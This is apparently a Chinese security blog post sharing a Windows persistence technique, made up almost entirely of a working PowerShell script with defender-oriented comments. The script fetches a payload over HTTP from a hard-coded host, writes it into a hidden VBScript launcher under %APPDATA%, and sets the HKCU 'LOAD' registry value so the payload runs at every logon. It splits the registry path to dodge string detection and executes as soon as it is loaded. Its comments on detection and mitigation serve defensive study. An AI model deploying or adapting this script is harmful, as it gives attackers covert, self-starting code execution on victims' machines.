分享一个维权手法

#>
# Uses an encoded PowerShell command generated with Unicorn as the payload and modifies the
# registry so that the payload is executed when the user logs on.
#
# Add-Persistence: downloads text from a hard-coded URL, wraps it in a VBScript launcher
# saved as a hidden file under %APPDATA%, and registers that launcher in the per-user
# "LOAD" value of HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows, a legacy
# logon-time autostart location (MITRE ATT&CK T1547.001). No parameters; every value
# is hard-coded, and no elevation is required because only HKCU and %APPDATA% are touched.
#
# Defender notes:
#   - Detection: registry value-set telemetry on that key/value (e.g. Sysmon Event ID 13),
#     wscript.exe starting at logon from a .vbs under %APPDATA%, PowerShell script-block
#     logs containing Net.WebClient.DownloadString, and outbound HTTP to the URL below.
#   - Mitigation: baseline and monitor the LOAD value, restrict Windows Script Host where
#     feasible, and enable PowerShell script-block and module logging.
function Add-Persistence()
{
# URL the payload is fetched from (hard-coded; 192.168.0.0/16 is a private range, so this
# sample was presumably used inside a lab network).
$payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2"
# Directory the persistence launcher is written to (%APPDATA%, writable without elevation).
$tmpdir = $env:APPDATA;
# Path of the VBScript launcher; the "_log.vbs" name is presumably chosen to look innocuous.
$payloadvbsloaderpath = "$tmpdir\_log.vbs"
# Download the payload as a plain string over HTTP (no TLS, no integrity check of the content).
$payload = (New-Object Net.WebClient).DownloadString($payloadurl)
# Build the launcher: a WScript.Shell object runs the downloaded text via oShell.run; the
# payload is spliced verbatim into a VBScript string literal.
$vbs = "Set oShell = CreateObject( ""WScript.Shell"" )`r`n"
$vbs += "ps = ""$payload""`r`n"
$vbs += "oShell.run(ps),0,true"
$vbs | Out-File $payloadvbsloaderpath -Force
# Set the Hidden attribute so the launcher does not appear in default directory listings.
$fileObj = get-item $payloadvbsloaderpath -Force
$fileObj.Attributes = "Hidden"
# Assemble the registry path from fragments (likely intended to defeat simple string
# matching on "CurrentVersion\Windows"); the concatenated result is
# HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows
$HKCU1 = "HKCU:\"
$HKCU2 = "Software\Microsoft"
$HKCU3 = "\Windows NT\Current"
$HKCU4 = "Version\Windows"
$HKCU = $HKCU1 + $HKCU2 + $HKCU3 + $HKCU4
# Write the launcher path into the LOAD value; this is the line that establishes the
# logon-time persistence and the one a registry-monitoring rule should alert on.
Set-ItemProperty -Path $HKCU -Name LOAD -Value $payloadvbsloaderpath
}
# Top-level call: loading this script immediately performs the download, the hidden
# file write under %APPDATA% and the HKCU LOAD registry change; there is no dry-run or
# parameter to suppress it.
Add-Persistence
来源 https://mp.weixin.qq.com/s/t98nGFycEqSytvqQTK2lNw
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/3382.html